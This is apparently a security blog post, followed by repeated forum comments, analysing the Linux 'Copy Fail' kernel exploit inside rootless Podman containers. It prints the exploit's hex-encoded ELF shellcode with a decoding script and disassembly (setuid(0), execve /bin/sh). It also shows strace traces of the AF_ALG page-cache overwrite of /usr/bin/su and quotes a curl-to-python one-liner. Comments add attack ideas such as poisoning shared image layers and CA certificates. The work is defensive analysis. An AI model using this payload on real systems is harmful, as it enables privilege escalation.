CVE-2026-31431: Copy Fail vs. rootless containers

Sigh.

1. I would hope the default seccomp policy blocks AF_ALG in these containers. I bet it doesn’t. Oh well.

2. The write-to-RO-page-cache primitive STILL WORKED! It’s just that the particular exploit used had no meaningful effect in the already-root-in-a-container context. If you think you are safe, you’re probably wrong. All you need to make a new exploit is an fd representing something that you aren’t supposed to be able to write. This likely includes CoW things where you are supposed to be able to write after CoW but you aren’t supposed to be able to write to the source.

So:

- Are you using these containers with a common image or even a common layer in an image to isolate dangerous workloads from each other. Oops, they can modify the image layers and corrupt each other. There goes any sort of cross-tenant isolation.

- What if you get an fd backed by the zero page and write to it? This can’t result in anything that the administrator would approve of.

- What if you ro-bind-mount something in? It’s not ro any more.

> [...] that root was just my unprivileged podman user on the host

Couldn't you then simply re-run the exploit again as unprivileged podman user and gain root on the host?

If the goal is just preventing full root privileges, a CapabilityBoundingSet in a systemd unit will do.

However copy fail can be used in many other ways not contained by containers or the above settings. For example it can modify the /etc/ssl/certs to prepare for MitM attacks. If you have multiple containers based on the same image then one compromised CA set affects another.

tl;dr - within the container, the exploit works, and elevates to root (uid 0) within the container - BUT because that namespace actually maps to uid 1000 (the user) outside the container, the escalation does not flow up to the host.

But… does this escape the container? If not (the author seems to indicate it does not) then does it matter if you are in Docker or rootless Podman, right, since the end result is always: you have elevated to root within the container. If the rest of the container filesystem isolation does its job, the end result is the same? Though I guess another chained exploit to escape the container would be worse in Docker? Do I have that right?

Running sstrip on an ELF binary is called ELF "golfing"? TIL…

This feels LLM generated, lots of emdashes and even more text around a completely false premise.

Please post a tl;dr at the top or even in the subject. Many of us are scrambling to patch/reboot our **.

Table of Contents
Introduction
The vulnerability
Analyzing the shellcode
Setting up the lab
Setting up rootless Podman
Running the exploit inside a container
Tracing the exploit mechanism
Why rootless containers stopped the escalation
Catching the kernel in the act with eBPF
The uid_map proof
Conclusions

Introduction

In the previous post about SELinux MCS and GitLab runners, I briefly mentioned CVE-2026-31431 (“Copy Fail”) as a motivating example for per-job VM isolation. After that post went out I spent the weekend setting up a lab to actually run the exploit, trace it at the syscall level, and verify that the rootless Podman architecture we deploy on GNOME’s runners would contain it. This post documents the entire process: from disassembling the shellcode to watching the kernel reject the privilege escalation in real time.

The vulnerability

For a full technical breakdown of the root cause, the scatterlist mechanics, and the disclosure timeline, read Theori’s excellent writeup at xint.io/blog/copy-fail-linux-distributions. In this blog post we’ll initially analyze the shellcode embedded in the public exploit, then set up a lab to run it inside a rootless container and subsequently trace what happens at the kernel level.

Analyzing the shellcode

In the days following the disclosure I noticed a lot of people running the exploit on their systems without bothering to check what the shellcode actually does. Executing a compressed binary blob from a GitHub repository you have never audited is not a great security practice — for all you know it could be exfiltrating data or dropping a backdoor alongside the privilege escalation. So before running anything, let’s look at what the actual shellcode contains.

The shellcode is embedded in the Python exploit as a compressed and hex-encoded string:

78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a
154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56
c3ff593611fcacfa499979fac5190c0c0c0032c310d3

The script uses zlib.decompress() to turn this into raw bytes. To extract and inspect the payload:

#!/usr/bin/env python3
import zlib

hex_str = "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"

compressed_bytes = bytes.fromhex(hex_str)
raw_payload = zlib.decompress(compressed_bytes)

with open("shellcode.bin", "wb") as f:
    f.write(raw_payload)

print(f"Payload extracted: {len(raw_payload)} bytes")

Running file on the extracted binary confirms what we expect:

shellcode.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked...

This is not raw shellcode — it is a fully formed ELF executable. The exploit overwrites the beginning of /usr/bin/su with this tiny binary. When the OS executes su, it loads the corrupted pages from the page cache and runs the malicious ELF instead of the legitimate utility.

The standard objdump -d shellcode.bin produces no output because the exploit author used a technique called ELF golfing — stripping the Section Headers to compress the payload down to a few dozen bytes. Without a .text section, objdump gives up. To force raw disassembly:

objdump -D -b binary -m i386:x86-64 shellcode.bin

The first ~0x77 bytes are ELF header data that objdump tries to interpret as assembly, producing nonsensical add %al,(%rax) instructions. The actual code begins at offset 0x78. Here is the full disassembly with annotations:

The setuid(0) syscall (offsets 0x78 to 0x7e):

  78:   31 c0                 xor    %eax,%eax
  79:   31 ff                 xor    %edi,%edi
  7c:   b0 69                 mov    $0x69,%al
  7e:   0f 05                 syscall

xor %edi, %edi sets rdi to 0 — the first argument for the syscall. mov $0x69, %al loads 105 (decimal), which is the Linux x64 syscall number for setuid. The syscall instruction executes setuid(0).

The execve("/bin/sh") syscall (offsets 0x80 to 0x8d):

  80:   48 8d 3d 0f 00 00 00  lea    0xf(%rip),%rdi
  87:   31 f6                 xor    %esi,%esi
  89:   6a 3b                 push   $0x3b
  8b:   58                    pop    %rax
  8c:   99                    cltd
  8d:   0f 05                 syscall

lea 0xf(%rip), %rdi is a RIP-relative load — it looks 15 bytes ahead of the current instruction pointer, which lands exactly at offset 0x96, the start of the /bin/sh string. xor %esi, %esi sets argv to NULL. The push $0x3b / pop %rax sequence is a golfing trick to load 59 (execve) in fewer bytes than mov rax, 59. cltd sign-extends eax into edx, zeroing the third argument (envp) with a single byte. The final syscall executes execve("/bin/sh", NULL, NULL).

The clean exit (offsets 0x8f to 0x94):

  8f:   31 ff                 xor    %edi,%edi
  91:   6a 3c                 push   $0x3c
  93:   58                    pop    %rax
  94:   0f 05                 syscall

If execve somehow fails, the payload calls exit(0) (syscall 60) rather than crashing.

The hardcoded string (offsets 0x96 to 0x9d):

  96:   2f                    (bad)
  97:   62 69 6e 2f 73        (bad)
  9c:   68                    .byte 0x68
  9d:   00 00                 add    %al,(%rax)

objdump marks these as (bad) because it is trying to decode data as instructions. Converting the hex bytes 2f 62 69 6e 2f 73 68 00 to ASCII yields /bin/sh\0 — the null-terminated string that the lea instruction at offset 0x80 points to.

Setting up the lab

To reproduce the vulnerability I provisioned a Fedora 43 VM using virt-install. The kernel I had installed was 6.17.1-300.fc43.x86_64, which predates the fix entirely — the patch was backported into the stable 6.19.x tree starting with 6.19.12, so the entire 6.17.x line is vulnerable.

virt-install \
  --name cve-2026-31431 \
  --vcpus 4 \
  --memory 4096 \
  --disk path=/var/lib/libvirt/images/cve-2026-31431.qcow2,size=20,bus=virtio,format=qcow2 \
  --network bridge=virbr0,model=virtio \
  --location 'https://download.fedoraproject.org/pub/fedora/linux/releases/43/Everything/x86_64/os/' \
  --initrd-inject=/tmp/vm.ks \
  --extra-args="inst.ks=file:/vm.ks console=ttyS0,115200n8" \
  --graphics none

Setting up rootless Podman

On the Fedora VM, I configured rootless Podman following the same patterns we use on GNOME’s GitLab runners — a dedicated podman system user with linger enabled, pasta for networking (the modern replacement for slirp4netns), and a large Sub-UID/Sub-GID allocation.

dnf install -y podman

useradd -m podman

usermod --add-subuids 100000-165535 --add-subgids 100000-165535 podman

loginctl enable-linger podman

su - podman -c 'podman run --rm alpine echo "Rootless Podman is working!"'

Running the exploit inside a container

Running strace inside a container requires two overrides: --cap-add=SYS_PTRACE (container runtimes drop this capability by default) and --security-opt seccomp=unconfined (the default seccomp profile blocks ptrace). Without both, strace will fail immediately with PTRACE_TRACEME: Operation not permitted.

I downloaded copy_fail_exp.py into a local directory beforehand — the /vuln mount in the command below points to that directory. Worth noting: I also saw people running the exploit via curl https://copy.fail/exp | python3 && su directly, which is just as reckless as running the shellcode without inspecting it first. Always download, read, and understand what you are about to execute.

From the host VM as the podman user:

podman run --rm -it \
  --cap-add=SYS_PTRACE \
  --security-opt seccomp=unconfined \
  -v $(pwd):/vuln:Z \
  -w /vuln \
  fedora:43 bash

Inside the container, I installed strace, created an unprivileged test user, and ran the exploit:

dnf install -y strace python3 su -y
useradd testuser
chown testuser:testuser copy_fail_exp.py
cp /root/copy_fail_exp.py /home/testuser

su - testuser -c "strace -f -e trace=socket,bind,setsockopt,sendmsg,splice,execve,setuid -o python_trace.txt python3 copy_fail_exp.py"

Tracing the exploit mechanism

The strace output captured the exact mechanism by which the vulnerability corrupts the page cache. The exploit loops over the shellcode payload, writing it four bytes at a time into the in-memory cache of /usr/bin/su:

169   socket(AF_ALG, SOCK_SEQPACKET|SOCK_CLOEXEC, 0) = 4
169   bind(4, {sa_family=AF_ALG, salg_type="aead", salg_feat=0, salg_mask=0,
              salg_name="authencesn(hmac(sha256),cbc(aes))"}, 88) = 0
169   setsockopt(4, SOL_ALG, ALG_SET_KEY, "\10\0\1\0...", 40) = 0
169   setsockopt(4, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, 4) = 0
169   sendmsg(5, {msg_iov=[{iov_base="AAAA\177ELF", iov_len=8}]}, MSG_MORE) = 8
169   splice(3, [0], 7, NULL, 4, 0)     = 4
169   splice(6, NULL, 5, NULL, 4, 0)    = 4

Step by step:

The script creates an AF_ALG socket — the kernel’s userspace cryptographic API, available to unprivileged users by default
It binds to authencesn(hmac(sha256),cbc(aes)), the specific cipher whose ESN scratch write triggers the bug
sendmsg delivers an 8-byte message. The first four bytes (AAAA) are padding; the next four (\177ELF) are the data to write — the start of the ELF header. In later iterations, different 4-byte chunks of the shellcode are sent (e.g., iov_base="AAAA1\3001\377")
splice() transfers page cache pages of /usr/bin/su into the crypto socket’s buffer without copying to userspace. The kernel’s authencesn scratch write then deposits those four bytes from sendmsg directly into the page cache, bypassing file permissions entirely

This pattern repeats dozens of times until the entire malicious ELF payload is staged into the page cache. At the end:

170   execve("/usr/sbin/su", ["su"], 0x559f5d7fbe50 /* 22 vars */) = 0
170   execve("/bin/sh", NULL, NULL)     = 0

The script executes su, which loads from the corrupted page cache and runs the malicious payload instead of the legitimate binary.

Why rootless containers stopped the escalation

The exploit successfully overwrote /usr/bin/su in the page cache, executed the shellcode, and escalated to root inside the container — the prompt changed to [root@ce307d49e132 testuser]# and setuid(0) returned success. But that root is contained by User Namespace UID mappings.

Rootless Podman relies on Linux User Namespaces. When you start a rootless container, Podman creates a user namespace where the container’s internal UID space is mapped to unprivileged UIDs on the host. The kernel allows setuid(0) to succeed because UID 0 inside the namespace is a valid identity — but it is mapped to an unprivileged host user. As we verify in the uid_map proof section below, container root (UID 0) maps directly to UID 1000 on the host — the podman user account. The exploit’s “root” shell has no more host-level privilege than that unprivileged user. It cannot modify host system files, cannot access /etc/shadow, and cannot interact with host processes outside the namespace.

Catching the kernel in the act with eBPF

There is a complication with using strace to observe the setuid(0) rejection. When ptrace is attached to a process that executes a SUID binary, the kernel triggers a secureexec transition and temporarily suspends event reporting to prevent an unprivileged debugger from hijacking a potentially privileged process. The setuid(0) call happens during this blindspot, so strace misses it.

To watch the kernel reject the call without debugger interference, I used bpftrace on the host. eBPF hooks into the kernel tracepoint directly and is not subject to the ptrace restrictions:

bpftrace -e '
tracepoint:syscalls:sys_enter_setuid /comm == "su"/ {
    printf("Process %d (%s) attempting setuid(%d)...\n", pid, comm, args->uid);
}
tracepoint:syscalls:sys_exit_setuid /comm == "su"/ {
    printf("...Kernel responded with: %d\n", args->ret);
}'

With this running on the host, I executed the exploit inside the container both with and without strace. The bpftrace output captured all the runs:

Process 27122 (su) attempting setuid(0)...
...Kernel responded with: -1

Process 27419 (su) attempting setuid(0)...
...Kernel responded with: 0

The -1 response (EPERM) correspond to the run where strace was attached. When ptrace is active on a process that executes a SUID binary, the kernel preemptively strips the SUID privileges to prevent a debugger from hijacking a potentially privileged process.

The 0 response correspond to the native run without strace. The exploit succeeded — setuid(0) returned success and the prompt changed to [root@ce307d49e132 testuser]#. But this is root inside the container, which — as the User Namespace mapping proves below — is just UID 1000 on the host. The exploit achieved full privilege escalation within the container’s namespace, but the namespace boundary prevented it from meaning anything on the host.

The uid_map proof

The final piece of evidence comes from the kernel’s UID mapping table. Inside the rootless container:

cat /proc/self/uid_map
         0       1000          1
         1     100000      65536
     65537     524288      65536

The first line is the critical one: 0 1000 1 means UID 0 (root) inside the container is mapped to UID 1000 on the host — my unprivileged podman user. The remaining lines map the subordinate UID ranges we configured earlier.

Confirming from the host side by running sleep 100 inside the container and checking the host process table:

podman     27943  0.0  0.0   2984  2028 pts/1    S+   22:15   0:00 sleep 100

The process is owned by podman, not root. Even with a root prompt inside the container, every action is constrained to what UID 1000 can do on the host. The exploit’s “root” shell cannot modify host system files, cannot access /etc/shadow, cannot interact with host processes — it is trapped within the User Namespace boundary.

Conclusions

Rootless containers handled this container escape scenario as expected. The exploit obtained root inside the container, but User Namespace UID mappings ensured that root was just my unprivileged podman user on the host. The page cache write worked, the shellcode executed, setuid(0) returned success — and none of it mattered outside the namespace boundary. This is exactly the kind of scenario rootless architectures were designed for, and it is why we run GNOME’s GitLab runners this way, at least for now, until we look deeper into ephemeral microVMs via Cloud Hypervisor + fleeting-plugin-fleetingd.

For those running OpenShift, I would highly suggest enabling User Namespace support for pods. User Namespaces were made GA starting from OpenShift 4.20 and provide the same UID mapping isolation we demonstrated here with rootless Podman — container root maps to an unprivileged host user, which means kernel LPEs like Copy Fail cannot escape the pod boundary even when the exploit itself succeeds.

Edit 1 (May 5, 2026): While rootless containers prevent the attacker from escalating to host root, the page cache is still shared across the host. Containers that re-use the same base image layers share the same cached pages for those layers — if a malicious CI job corrupts a binary in the page cache, other containers launched from that same image could end up executing the poisoned version. This breaks container-to-container isolation to some extent without ever needing to escape to the host.

If we weren’t already looking into moving away from containers completely into ephemeral microVMs, one area I’d invest in would be replicating what CargoWall does for GitHub Actions in GitLab CI. At that point, even if the attacker gained access to a container and modified a binary with specific instructions — like reading environment variables and sending them to an external server — it would not be able to send credentials or fetch malware remotely at all, because DNS queries would be intercepted by eBPF and routed through a CoreDNS proxy.

That said, I still think rootless containers raise the attack complexity well beyond a one-liner. Exploiting the shared page cache scenario requires understanding additional details about the underlying host: what container images and shared image layers are present, whether those images contain setuid binaries, and whether other CI jobs explicitly call those binaries during their build process.

This feels LLM generated, lots of emdashes and even more text around a completely false premise.

What is the false premise in the article?

If the goal is just preventing full root privileges, a CapabilityBoundingSet in a systemd unit will do.

I added these

    AmbientCapabilities=CAP_NET_BIND_SERVICE
    CapabilityBoundingSet=CAP_NET_BIND_SERVICE
    NoNewPrivileges=yes

to my .service. Is it good enough?

Running sstrip on an ELF binary is called ELF "golfing"? TIL…

It is, although real ELF golfers consider that a little naive.

> [...] that root was just my unprivileged podman user on the host

Couldn't you then simply re-run the exploit again as unprivileged podman user and gain root on the host?

No, because you're still in the container, and there's no route to the host's root from there.

If you can orchestrate a container escape from the container's "root", then you're on to something.

did anyone try it? it suppose to work right?

This is a problem and most people hadn’t considered it before because the caching is done to speed up build pipeline performance:

“ While rootless containers prevent the attacker from escalating to host root, the page cache is still shared across the host. Containers that re-use the same base image layers share the same cached pages for those layers — if a malicious CI job corrupts a binary in the page cache, other containers launched from that same image could end up executing the poisoned version.”

Sigh.

1. I would hope the default seccomp policy blocks AF_ALG in these containers. I bet it doesn’t. Oh well.

So:

- What if you get an fd backed by the zero page and write to it? This can’t result in anything that the administrator would approve of.

- What if you ro-bind-mount something in? It’s not ro any more.

> I would hope the default seccomp policy blocks AF_ALG in these containers. I bet it doesn’t. Oh well.

there is no reason it would be default policy. Else might as well block every socket and just multiplex everything on stdin/out

> I would hope the default seccomp policy blocks AF_ALG in these containers. I bet it doesn’t. Oh well.

I see a lot of projects blocking those sockets in containers as a response to this exploit, but it seems rather strange to me. We're disabling a cryptographic performance enhancement feature entirely because there was a security bug in them that one time? It's a rather weird default to use. It's not like we're mass-disabling kernel modules everywhere every time someone discovers an EoP bug, do we? Did we blacklist OpenSSL's binaries after Heartbleed?

I suppose it makes sense as a default on vulnerable kernels (though people running vulnerable kernels should put effort into patching rather than workarounds in my opinion), but these defaults are going to be around ten years from now when copy.fail is a distant memory.

In fact, the authors specifically say on the very first line of their website that the copy/fail primitive can be used as a container escape. The entire premise of this article is flawed and irresponsible.

I just contributed this [1] which does what you want for seccomp. Well, not by default, but profiling is now effective against this attack.

Oh, an this [2] just happened

[1] https://github.com/containers/oci-seccomp-bpf-hook/pull/209 [2] https://github.com/moby/moby/pull/52501

There is an addendum at the bottom where they admit the page corruption is still problematic even with rootless podman.

Although using this to justify their migration to micro-VMs is very strange to me. Sure for this CVE it would have been better, but surely for a future attack it could hit a component shared across VMs but not containers? Are people really choosing technology based on CVE-of-the-week?

I've not looked for podman but moby/docker I believe does now block this https://github.com/moby/profiles/commit/7158007a83005b14a24f...

Please post a tl;dr at the top or even in the subject. Many of us are scrambling to patch/reboot our **.

This isn't a new CVE. It's just documenting what happened when this person ran the exploit inside a certain type of container.

tl;dr (not from article)

    echo -e 'install algif_aead /bin/false\n' > /etc/modprobe.d/disable-algif.conf

that just prevents the faulty module from loading. So you have time to fix it properly (kernel upgrade)

Technically there should be zero impact (the very very few tools that use it will fall back to userspace), I haven't even found that module loaded in infrastructure

Then check if it is loaded, and if it is, unload/reboot

It already has a table of contents. The heading titled "why rootless containers stopped the escalation" is your tl;dr.

I added these

    AmbientCapabilities=CAP_NET_BIND_SERVICE
    CapabilityBoundingSet=CAP_NET_BIND_SERVICE
    NoNewPrivileges=yes

to my .service. Is it good enough?

No, because you're still in the container, and there's no route to the host's root from there.

If you can orchestrate a container escape from the container's "root", then you're on to something.

This is a problem and most people hadn’t considered it before because the caching is done to speed up build pipeline performance:

I just contributed this [1] which does what you want for seccomp. Well, not by default, but profiling is now effective against this attack.

Oh, an this [2] just happened

[1] https://github.com/containers/oci-seccomp-bpf-hook/pull/209 [2] https://github.com/moby/moby/pull/52501

did anyone try it? it suppose to work right?

tl;dr (not from article)

    echo -e 'install algif_aead /bin/false\n' > /etc/modprobe.d/disable-algif.conf

that just prevents the faulty module from loading. So you have time to fix it properly (kernel upgrade)

Technically there should be zero impact (the very very few tools that use it will fall back to userspace), I haven't even found that module loaded in infrastructure

Then check if it is loaded, and if it is, unload/reboot

It already has a table of contents. The heading titled "why rootless containers stopped the escalation" is your tl;dr.

I've not looked for podman but moby/docker I believe does now block this https://github.com/moby/profiles/commit/7158007a83005b14a24f...

This isn't a new CVE. It's just documenting what happened when this person ran the exploit inside a certain type of container.

> I would hope the default seccomp policy blocks AF_ALG in these containers. I bet it doesn’t. Oh well.

there is no reason it would be default policy. Else might as well block every socket and just multiplex everything on stdin/out

I'd have guessed that the default paranoia-first policy would be "drop everything; verify what you need" which would include AF_ALG.

share and enjoy!

>might as well block every socket and just multiplex everything on stdin/out

You may be on to something…

It is, although real ELF golfers consider that a little naive.

It does feel a little simplistic to get a special name. But lesser things have gotten fancier names...

Sorry for posting a n00b question, but could you share etymology on this term golfing?

What is the false premise in the article?

That rootless containers mitigate kernel exploits.

> I would hope the default seccomp policy blocks AF_ALG in these containers. I bet it doesn’t. Oh well.

> We're disabling a cryptographic performance enhancement feature entirely because there was a security bug in them that one time? It's a rather weird default to use.

The need for this feature/functionality in the fist place is questioned by some:

> As someone who works on the Linux kernel's cryptography code, the regularly occurring AF_ALG exploits are really frustrating. AF_ALG, which was added to the kernel many years ago without sufficient review, should not exist. It's very complex, and it exposes a massive attack surface to unprivileged userspace programs. And it's almost completely unnecessary, as userspace already has its own cryptography code to use. The kernel's cryptography code is just for in-kernel users (for example, dm-crypt).

> The algorithm being used in this [specific] exploit, "authencesn", is even an IPsec implementation detail, which never should have been exposed to userspace as a general-purpose en/decryption API. […]

* https://news.ycombinator.com/item?id=47952181#unv_47956312

In fairness, after heartbleed - there was quite a push to move away from openSSL - like Google's boring ssl, openbsd libressl and Mozilla/nss or gnutls - but the alternative here would be moving to a different kernel, like freebsd or open Solaris/Illumos ...

iiuc the AF_ALG interface only offers real performance wins if you have specialized hardware that the kernel can offload computations to. If you're not using that hardware, there's little reason not to do the crypto in userspace.

> We're disabling a cryptographic performance enhancement feature entirely because there was a security bug in them that one time?

To my knowledge, not many things were using the in-kernel code anyways, the recommended way is to use userland tools...

It's optional for openssl, systemd apparently needs it, but deleting the module from one of my systems didn't cause any issues. /shrug

There is an addendum at the bottom where they admit the page corruption is still problematic even with rootless podman.

Containers were never a security boundary. VMs have better isolation, which is why people choose them for security. Containers are convenience and usually have better performance.

>might as well block every socket and just multiplex everything on stdin/out

You may be on to something…

It does feel a little simplistic to get a special name. But lesser things have gotten fancier names...

That rootless containers mitigate kernel exploits.

I'd have guessed that the default paranoia-first policy would be "drop everything; verify what you need" which would include AF_ALG.

share and enjoy!

> We're disabling a cryptographic performance enhancement feature entirely because there was a security bug in them that one time? It's a rather weird default to use.

The need for this feature/functionality in the fist place is questioned by some:

* https://news.ycombinator.com/item?id=47952181#unv_47956312

that's just moving to kernel that had 1000x less eyes on it. Yeah sure it will have less exploits but purely because nobody bothers to look when there are much juicer targets on Linux.

But I am disappointed that we still don't have clear OpenSSL successor, there is nothing to be salvaged from this mess of a project

Containers were never a security boundary. VMs have better isolation, which is why people choose them for security. Containers are convenience and usually have better performance.

They may not provide isolation as VMs but they clearly do limit some attacks. VMs do not provide the same isolation as using physically separate hardware either.

I would have thought they provide better isolation than using multiple users which is the traditional security boundary.

It might depends on what you mean by a container? Are sandboxes such as Bubblewrap and Firejail containers?

I see the ‘not a security boundary’ thing repeated constantly, and while it makes sense (eg. they’re sharing the underlying kernel or at least some access to it) if you think about it a little more, VMs are not magically different: they are better isolated, but VMs on the same host still share the host in common. A CVE next week that allows corruption of host state that affects eg every VM under a particular hypervisor will be no less damaging than this CVE is to containers

Containers are a convenience boundary and they increase complexity of your risk assessments.

It is easy for security scanners to scan a Linux system, but will they inspect your containers, and snaps, and flatpaks, and VMs? It is easy for DevOps to ssh into your Linux server, but can they also get logged in to each container, and do useful things? Your patches and all dependencies are up-to-date on your server, but those containers are still dragging around legacy dependencies, by design. Is your backup system aware of containers and capable of creating backup images or files, that are suitable for restoring back to service?

Sorry for posting a n00b question, but could you share etymology on this term golfing?

It’s manipulating the binary to make it as small as possible. In golf, the lowest score wins. So, in this context, the smallest binary that still works wins.

In golf, lower scores are better.

> We're disabling a cryptographic performance enhancement feature entirely because there was a security bug in them that one time?

To my knowledge, not many things were using the in-kernel code anyways, the recommended way is to use userland tools...

It's optional for openssl, systemd apparently needs it, but deleting the module from one of my systems didn't cause any issues. /shrug

I haven't had it loaded on 100s of servers ranging kernel version from 5.10 to 6.14. The use is just that low

It’s manipulating the binary to make it as small as possible. In golf, the lowest score wins. So, in this context, the smallest binary that still works wins.

I haven't had it loaded on 100s of servers ranging kernel version from 5.10 to 6.14. The use is just that low

They may not provide isolation as VMs but they clearly do limit some attacks. VMs do not provide the same isolation as using physically separate hardware either.

I would have thought they provide better isolation than using multiple users which is the traditional security boundary.

It might depends on what you mean by a container? Are sandboxes such as Bubblewrap and Firejail containers?

that's just moving to kernel that had 1000x less eyes on it. Yeah sure it will have less exploits but purely because nobody bothers to look when there are much juicer targets on Linux.

But I am disappointed that we still don't have clear OpenSSL successor, there is nothing to be salvaged from this mess of a project

1000x less eyes is true, but also: Linux, even in the kernel, has a long history of "move fast and break things".

Yes, the syscall API is (famously) stable, but the drivers, for example, are such a mess that many non-Linux projects prefer to take BSD drivers for e.g. WiFi despite them supporting far fewer devices (even if the Linux ones would be license compatible).

Containers are a convenience boundary and they increase complexity of your risk assessments.

In golf, lower scores are better.

Security scanners already support most container and VM image formats in widespread use.

Does this increase complexity? Yes, it does. Is it worth the cost? Depends on each individual case IMO.

You are obviously right that these are similar in principle: VM isolation exploit would lead to the same exposure like container-related isolation exploits.

VMs are considered vastly better because the surface area where exploits can happen is smaller and/or better isolated within the kernel.

If you are arguing the latter is not true — and we are all collectively hand-waving away big chunk of the surface area so that may be the case — it would help to be explicit in why you believe an exploit in that area is similarly likely?

1000x less eyes is true, but also: Linux, even in the kernel, has a long history of "move fast and break things".

Security scanners already support most container and VM image formats in widespread use.

Does this increase complexity? Yes, it does. Is it worth the cost? Depends on each individual case IMO.

You need a tool like Anchore and PrismaCloud to scan the container images then monitor them in runtime with PrismaCloud. Trellix can “scan” however most people turn off or exclude container directories on the host because it can interfere with the running container.

You are obviously right that these are similar in principle: VM isolation exploit would lead to the same exposure like container-related isolation exploits.

VMs are considered vastly better because the surface area where exploits can happen is smaller and/or better isolated within the kernel.

I would say it's the fact that "not a security boundary" appears to be a pass/fail statement, whereas the reality is more like a security continuum, along which VMs are further than containers.

Hacker Times

Hacker Times

CVE-2026-31431: Copy Fail vs. rootless containers

Discussion

Discussion

Table of Contents

Introduction

The vulnerability

Analyzing the shellcode

Setting up the lab

Setting up rootless Podman

Running the exploit inside a container

Tracing the exploit mechanism

Why rootless containers stopped the escalation

Catching the kernel in the act with eBPF

The uid_map proof

Conclusions